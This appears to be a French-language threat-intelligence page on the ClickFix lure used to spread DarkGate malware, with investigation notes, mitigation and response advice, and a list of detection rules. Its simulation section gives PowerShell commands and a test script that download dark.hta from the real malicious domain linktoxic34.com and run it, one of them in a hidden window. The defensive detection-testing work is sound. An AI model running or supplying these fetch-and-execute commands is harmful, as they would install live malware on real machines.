Étude de Cas ClickFix : Malware DarkGate
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Le rapport décrit une méthode d’ingénierie sociale appelée ClickFix qui incite les utilisateurs à copier et exécuter une commande PowerShell, laquelle télécharge ensuite un fichier HTA malveillant. Ce fichier HTA à son tour télécharge des composants supplémentaires, y compris un script AutoIt qui crée des répertoires, dépose des fichiers et établit des communications C2. L’activité est attribuée à la campagne DarkGate et repose sur l’obfuscation base64 ainsi que la falsification du presse-papiers pour éviter une détection directe.
Enquête
Les analystes ont démêlé plusieurs couches de contenu encodé en base64 intégré dans une fausse page d’alerte d’extension de navigateur et ont récupéré la commande PowerShell responsable de la récupération de dark.hta depuis linktoxic34.com. Lorsque exécuté, le HTA déploie un exécutable AutoIt (fckhffh.a3x) qui exécute une routine DES et lance d’autres charges utiles. La télémétrie réseau capturée montre un trafic HTTP(S) vers le domaine malveillant, suivi par une exécution enchaînée de scripts PowerShell.
Mitigation
Les défenses recommandées incluent la formation des utilisateurs pour les dissuader de copier des extraits de code inconnus, désactiver la boîte de dialogue Exécuter de Windows via les stratégies de groupe et déployer des solutions antivirus basées sur le comportement. Bloquer de manière proactive le domaine malveillant et surveiller les exécutions de PowerShell anormales peut réduire significativement le risque d’infection par DarkGate.
Réponse
Si un événement lié à ClickFix est identifié, isolez le point d’extrémité concerné, arrêtez tous les processus malveillants, retirez les artefacts HTA et AutoIt, et effectuez une analyse forensic sur tous les dossiers créés lors de l’intrusion. Mettez à jour la logique de détection pour signaler les schémas d’exécution PowerShell et HTA suspects et assurez-vous que le domaine associé est bloqué dans tout l’environnement.
Flux d’attaque
Détections
Comportement d’évasion de détection suspect LOLBAS MSHTA par détection de commandes associées (via création_de_processus)
Voir
Chaînes PowerShell suspectes (via powershell)
Voir
Binaire AutoIT exécuté depuis un emplacement inhabituel (via création_de_processus)
Voir
Fichiers suspects dans le profil utilisateur public (via événement_de_fichier)
Voir
Exécution suspecte depuis le profil utilisateur public (via création_de_processus)
Voir
Appel de méthodes .NET suspectes depuis PowerShell (via powershell)
Voir
IOCs (HashSha256) pour détecter : ClickFix : DarkGate
Voir
Détection d’Activité PowerShell Malveillante pour le Téléchargement de Fichier HTA [Connexion Réseau Windows]
Voir
Activité PowerShell Malveillante Impliquant l’Exécution de HTA et la Manipulation du Presse-papiers [PowerShell Windows]
Voir
Exécution de Simulation
Prérequis : Le Vérification Préliminaire de Télémétrie & de Base doit avoir été réussie.
Justification : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection.
-
Narratif d’Attaque & Commandes :
Un attaquant qui a obtenu un accès de basse-privilège sur un hôte Windows compromis souhaite télécharger une charge utile HTA malveillante utilisée dans la campagne ClickFix. Pour rester discret, l’attaquant utilise PowerShell—un outil natif de Windows—de sorte qu’aucun binaire externe n’est introduit. La commande est exécutée directement dans la console (ou via une tâche planifiée) et inclut l’URL exacte que la règle surveille. Le téléchargement est stocké dans le%TEMP%répertoire de l’utilisateur et est ensuite exécuté viaStart-Process.$url = "https://linktoxic34.com/wp-content/themes/twentytwentytwo/dark.hta" $out = "$env:TEMPdark.hta" Invoke-WebRequest -Uri $url -OutFile $out Start-Process -FilePath $out -
Script de Test de Régression : (autosuffisant, reproduit les étapes ci-dessus)
# Simulation de téléchargement de ClickFix HTA – déclenche la règle Sigma $maliciousUrl = "https://linktoxic34.com/wp-content/themes/twentytwentytwo/dark.hta" $destPath = "$env:TEMPdark.hta" try { Write-Host "[*] Téléchargement de la charge utile HTA malveillante en cours..." Invoke-WebRequest -Uri $maliciousUrl -OutFile $destPath -UseBasicParsing Write-Host "[+] Téléchargement terminé. Exécution de la charge utile..." Start-Process -FilePath $destPath -WindowStyle Hidden } catch { Write-Error "Échec du téléchargement ou de l'exécution : $_" } -
Commandes de Nettoyage : (supprime le HTA téléchargé et toute instance en cours d’exécution)
# Supprimer le fichier HTA et terminer tout processus résiduel $htaPath = "$env:TEMPdark.hta" if (Test-Path $htaPath) { Remove-Item $htaPath -Force Write-Host "[*] Fichier HTA supprimé." } # Tuer tout processus qui pourrait avoir été lancé depuis le HTA (exemple générique) Get-Process | Where-Object {$_.Path -like "*dark.hta*"} | Stop-Process -Force